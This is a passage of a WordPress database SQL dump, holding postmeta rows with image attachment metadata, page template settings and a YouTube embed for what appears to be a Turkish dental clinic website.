6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4558, 6418, '_wp_attached_file', '2018/07/protez-implat.jpg'),
(4559, 6418, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2018/07/protez-implat.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"protez-implat-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"protez-implat-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:25:\"protez-implat-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:25:\"protez-implat-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:25:\"protez-implat-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4562, 8, '_edit_last', '1'),
(4563, 8, '_wp_page_template', 'default'),
(4600, 5467, '_edit_lock', '1531747935:1'),
(4601, 5467, '_edit_last', '1'),
(4602, 5467, 'slide_template', 'default'),
(4603, 5467, '_wpb_vc_js_status', 'true'),
(4604, 6424, '_wp_attached_file', '2018/07/adpol.png'),
(4605, 6424, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:826;s:6:\"height\";i:84;s:4:\"file\";s:17:\"2018/07/adpol.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"adpol-150x84.png\";s:5:\"width\";i:150;s:6:\"height\";i:84;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"adpol-300x31.png\";s:5:\"width\";i:300;s:6:\"height\";i:31;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:16:\"adpol-350x84.png\";s:5:\"width\";i:350;s:6:\"height\";i:84;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:16:\"adpol-600x84.png\";s:5:\"width\";i:600;s:6:\"height\";i:84;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:16:\"adpol-600x61.png\";s:5:\"width\";i:600;s:6:\"height\";i:61;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:16:\"adpol-600x84.png\";s:5:\"width\";i:600;s:6:\"height\";i:84;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4620, 6432, '_wp_attached_file', '2018/07/slider-1-bg.jpg'),
(4621, 6432, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:600;s:4:\"file\";s:23:\"2018/07/slider-1-bg.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"slider-1-bg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"slider-1-bg-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"slider-1-bg-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:23:\"slider-1-bg-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:23:\"slider-1-bg-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:23:\"slider-1-bg-600x188.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:23:\"slider-1-bg-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4622, 6433, '_wp_attached_file', '2018/07/slider-implant.jpg'),
(4623, 6433, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:600;s:4:\"file\";s:26:\"2018/07/slider-implant.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"slider-implant-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"slider-implant-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"slider-implant-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:26:\"slider-implant-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:26:\"slider-implant-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:26:\"slider-implant-600x188.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:26:\"slider-implant-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4624, 6434, '_wp_attached_file', '2018/07/slider-kurum.jpg'),
(4625, 6434, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:600;s:4:\"file\";s:24:\"2018/07/slider-kurum.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"slider-kurum-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"slider-kurum-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"slider-kurum-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:24:\"slider-kurum-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:24:\"slider-kurum-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:24:\"slider-kurum-600x188.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:24:\"slider-kurum-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4626, 6435, '_wp_attached_file', '2018/07/slider-tel.jpg'),
(4627, 6435, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2018/07/slider-tel.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"slider-tel-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"slider-tel-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"slider-tel-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:22:\"slider-tel-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:22:\"slider-tel-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:22:\"slider-tel-600x188.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:22:\"slider-tel-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4667, 6394, '_oembed_9e4f3890d178b7a0064dc89e8a6fa819', '<iframe width=\"500\" height=\"281\" src=\"https://www.youtube.com/embed/pwARL_V4BKg?feature=oembed\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen></iframe>'),
(4668, 6394, '_oembed_time_9e4f3890d178b7a0064dc89e8a6fa819', '1531822600'),
(4804, 5774, '_edit_lock', '1531823681:1'),
(4805, 5774, '_edit_last', '1'),
(4806, 5774, '_wp_page_template', 'default'),
(4807, 5774, 'slide_template', 'default'),
(4808, 5774, '_wpb_vc_js_status', 'true'),
(4809, 5774, 'us_header', ''),
(4810, 5774, 'us_header_id', ''),
(4811, 5774, 'us_header_sticky_override', '0'),
(4812, 5774, 'us_header_transparent_override', '0'),
(4813, 5774, 'us_header_shadow', '0'),
(4814, 5774, 'us_titlebar_breadcrumbs', ''),
(4815, 5774, 'us_titlebar_bg_repeat', ''),
(4816, 5774, 'us_titlebar_bg_position', ''),
(4817, 5774, 'us_titlebar_bg_parallax', ''),
(4818, 5774, 'us_sidebar_pos', 'right'),
(4819, 6499, '_wp_attached_file', '2018/07/logo6.jpg');
INSERT INTO `zdenl_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(4820, 6499, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:294;s:4:\"file\";s:17:\"2018/07/logo6.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"logo6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"logo6-300x147.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:17:\"logo6-350x294.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:17:\"logo6-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:17:\"logo6-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:17:\"logo6-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4825, 6507, '_wp_attached_file', '2018/07/fav.png'),
(4826, 6507, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:473;s:6:\"height\";i:473;s:4:\"file\";s:15:\"2018/07/fav.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"fav-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"fav-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:15:\"fav-350x350.png\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:15:\"fav-473x400.png\";s:5:\"width\";i:473;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4827, 6508, '_wp_attached_file', '2018/07/logo-y.png'),
(4828, 6508, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:210;s:4:\"file\";s:18:\"2018/07/logo-y.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"logo-y-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"logo-y-300x105.png\";s:5:\"width\";i:300;s:6:\"height\";i:105;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:18:\"logo-y-350x210.png\";s:5:\"width\";i:350;s:6:\"height\";i:210;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:18:\"logo-y-600x210.png\";s:5:\"width\";i:600;s:6:\"height\";i:210;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:18:\"logo-y-600x210.png\";s:5:\"width\";i:600;s:6:\"height\";i:210;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:18:\"logo-y-600x210.png\";s:5:\"width\";i:600;s:6:\"height\";i:210;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4829, 6509, '_wp_attached_file', '2018/07/d-y.png'),
(4830, 6509, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:185;s:6:\"height\";i:191;s:4:\"file\";s:15:\"2018/07/d-y.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"d-y-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4831, 6510, '_wp_attached_file', '2018/07/e-m-y.png'),
(4832, 6510, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:185;s:6:\"height\";i:191;s:4:\"file\";s:17:\"2018/07/e-m-y.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"e-m-y-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4835, 6512, '_wp_attached_file', '2018/07/logo-slider-y.png'),
(4836, 6512, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:353;s:6:\"height\";i:311;s:4:\"file\";s:25:\"2018/07/logo-slider-y.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"logo-slider-y-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"logo-slider-y-300x264.png\";s:5:\"width\";i:300;s:6:\"height\";i:264;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:25:\"logo-slider-y-350x311.png\";s:5:\"width\";i:350;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4837, 6513, '_wp_attached_file', '2018/07/n-y.png'),
(4838, 6513, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:185;s:6:\"height\";i:191;s:4:\"file\";s:15:\"2018/07/n-y.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"n-y-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4839, 6514, '_wp_attached_file', '2018/07/t-y.png'),
(4840, 6514, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:185;s:6:\"height\";i:191;s:4:\"file\";s:15:\"2018/07/t-y.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"t-y-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4841, 6515, '_wp_attached_file', '2018/07/z-y.png'),
(4842, 6515, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:185;s:6:\"height\";i:191;s:4:\"file\";s:15:\"2018/07/z-y.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"z-y-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4843, 6516, '_wp_attached_file', '2018/07/e-y-y.png'),
(4844, 6516, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:185;s:6:\"height\";i:191;s:4:\"file\";s:17:\"2018/07/e-y-y.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"e-y-y-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4848, 6250, '_wp_old_slug', 'diseti-hastaliklari-periodontal'),
(4849, 6406, '_wp_old_slug', 'agiz-hastaliklari-periodontoloji'),
(4850, 6532, '_wp_attached_file', '2018/07/slider-tel2.jpg'),
(4851, 6532, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:600;s:4:\"file\";s:23:\"2018/07/slider-tel2.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"slider-tel2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"slider-tel2-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"slider-tel2-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:23:\"slider-tel2-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:23:\"slider-tel2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:23:\"slider-tel2-600x188.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:23:\"slider-tel2-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(4855, 6534, '_wp_attached_file', '2018/07/danistay.jpg'),
